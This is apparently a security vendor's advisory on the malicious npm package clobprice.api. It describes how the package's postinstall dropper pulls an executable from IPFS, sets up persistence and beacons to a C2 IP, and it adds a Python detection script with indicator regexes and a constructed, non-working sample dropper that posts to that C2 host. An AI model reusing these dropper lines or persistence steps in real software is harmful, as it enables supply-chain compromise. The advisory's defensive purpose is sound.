clobprice.api (npm)
Malicious code in clobprice.api (npm)
Remove it immediately and rotate any exposed credentials.
What this malware does
A campaign of npm packages sharing a common dropper (clob.js) that downloads and persistently installs a Windows executable from IPFS on postinstall. The dropper fetches the binary from IPFS CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa via multiple public gateways (Pinata, Cloudflare, ipfs.io), drops it to %LOCALAPPDATA%, registers Windows Registry persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run using a hidden VBScript wrapper (window style 0, no taskbar entry), launches the payload immediately, and reports the victim's public IP address to a hardcoded C2 server via HTTP POST. macOS and Linux stubs are present but not yet configured. Developer artifacts bundled in config/meta_data.json leak the attacker's build path: E:\getting IP and check list\clob-downloader\.
clobprice.api bundles 'windows defender host.exe' (≈4 MB) directly in the package tarball and also attempts to fetch an identical copy from IPFS at install time. Its postinstall script runs clob.js, which drops the executable to %LOCALAPPDATA%\windows defender host.exe. The C2 beacon transmits the victim's public IP to http://45.8.22.112:2026/api/urls.
package.json declares postinstall: node clob.js and the package's own description states 'Downloads clob2.0.exe on install'. On install, clob.js downloads a Windows PE from anonymous IPFS gateways (violet-tricky-quelea-562.mypinata.cloud, cloudflare-ipfs.com, gateway.pinata.cloud, ipfs.io; CID bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa) without any hash or signature verification, writes it to %LOCALAPPDATA% as 'windows defender host.exe' to impersonate a Microsoft component, and silently launches it hidden via a VBS launcher invoked through wscript //nologo with window style 0. A 4,035,072-byte file literally named 'windows defender host.exe' (sha256 300a7dea05c2a588757010ad314fa55cb8ef3acebaa284f58a5cd0fd39bce478) is also bundled in the tarball root as a fallback payload. Persistence is established on every supported platform: Windows registers the launcher under HKCU\Software\Microsoft\Windows\CurrentVersion\Run as 'clob'; macOS loads ~/Library/LaunchAgents/com.clob.agent.plist via launchctl; Linux writes ~/.config/autostart/clob.desktop. After dropping the binary, the script resolves the installer's public IP via api.ipify.org and POSTs it over plain HTTP to the hardcoded bare IP 45.8.22.112:2026 at /api/urls?url=<ip>:80, performing victim check-in to the operator. The result is full, persistent host compromise of any machine that runs npm install clobprice.api.
Detection & response playbook
Backdoor / remote access
Find it
Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for clobprice.api (3 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging clobprice.api across your stack and pipelines.
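Beyond matching the package name in lockfiles, a local audit of an installed package can key on the behaviours the write-up describes: a postinstall hook that runs a bundled script, IPFS gateway fetches of the named CID, a hidden wscript launcher, Run-key persistence, the beacon host and the Defender-lookalike filename. The following is an added example, not O3's scanner or any code from the campaign; the sample package it audits is constructed here from the advisory's indicators and is not a working dropper.

```python
import json
import re
import tempfile
from pathlib import Path
# Indicators quoted from the advisory above; the package name is the primary one.
KNOWN_MALICIOUS = {"clobprice.api"}
IPFS_CID = "bafybeif3zkapj364ofnrvbty7oj5h5ufpxlp4s62usk3ulxrru35e3gssa"
INDICATORS = {
    "ipfs_gateway_fetch": re.compile(r"(mypinata\.cloud|cloudflare-ipfs\.com|gateway\.pinata\.cloud|ipfs\.io)/ipfs/", re.I),
    "known_payload_cid": re.compile(re.escape(IPFS_CID)),
    "hidden_vbs_launcher": re.compile(r"wscript\b.*//nologo", re.I),
    "run_key_persistence": re.compile(r"CurrentVersion\\Run", re.I),
    "c2_beacon_host": re.compile(r"45\.8\.22\.112:2026"),
    "defender_lookalike_name": re.compile(r"windows defender host\.exe", re.I),
}
def audit_package(pkg_dir):
    """Findings for one node_modules/<name> dir: bad name, install hooks, dropper strings."""
    pkg_dir = Path(pkg_dir)
    manifest = json.loads((pkg_dir / "package.json").read_text(encoding="utf-8"))
    findings = []
    if manifest.get("name") in KNOWN_MALICIOUS:
        findings.append(f"known-malicious package: {manifest['name']}")
    for hook in ("preinstall", "install", "postinstall"):
        cmd = manifest.get("scripts", {}).get(hook)
        if not cmd:
            continue
        findings.append(f"{hook} hook: {cmd}")
        m = re.search(r"\bnode\s+(\S+\.js)", cmd)  # hook executes a bundled JS file
        if m and (pkg_dir / m.group(1)).is_file():
            body = (pkg_dir / m.group(1)).read_text(encoding="utf-8", errors="replace")
            findings += [f"{m.group(1)}: {k}" for k, p in INDICATORS.items() if p.search(body)]
    return findings

# Constructed sample package: only the strings a scanner keys on, not a working dropper.
SAMPLE_MANIFEST = {"name": "clobprice.api", "version": "0.0.0-sample", "scripts": {"postinstall": "node clob.js"}}
SAMPLE_DROPPER = r"""const CID = "CID_PLACEHOLDER";
const urls = ["https://gateway.pinata.cloud/ipfs/" + CID, "https://ipfs.io/ipfs/" + CID];
const out = path.join(process.env.LOCALAPPDATA, "windows defender host.exe");
// persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
spawn("wscript", ["//nologo", vbs]);
post("http://45.8.22.112:2026/api/urls?url=" + ip);
""".replace("CID_PLACEHOLDER", IPFS_CID)

def demo():
    # Write the constructed sample into a temp dir and audit it; returns the findings list.
    with tempfile.TemporaryDirectory() as d:
        (Path(d) / "package.json").write_text(json.dumps(SAMPLE_MANIFEST), encoding="utf-8")
        (Path(d) / "clob.js").write_text(SAMPLE_DROPPER, encoding="utf-8")
        return audit_package(d)
```

Running audit_package over every directory under node_modules (and over unpacked tarballs in CI) surfaces any package whose install hook runs a local script carrying these strings, even before it is added to a known-bad list.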
If you installed it — respond
clobprice.api establishes remote access, so treat any host that installed it as fully compromised. Isolate the machine, remove the package, rotate all credentials it could reach, and rebuild from a trusted image rather than cleaning in place — a backdoor may have planted additional persistence.
Did it already run?
If clobprice.api was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.
How O3 protects you
O3 blocks clobprice.api before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.
Credits
- Amazon Inspector · finder
- SafeDep · finder
Detect & block this
O3 blocks clobprice.api-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the C2 callback and severs the channel.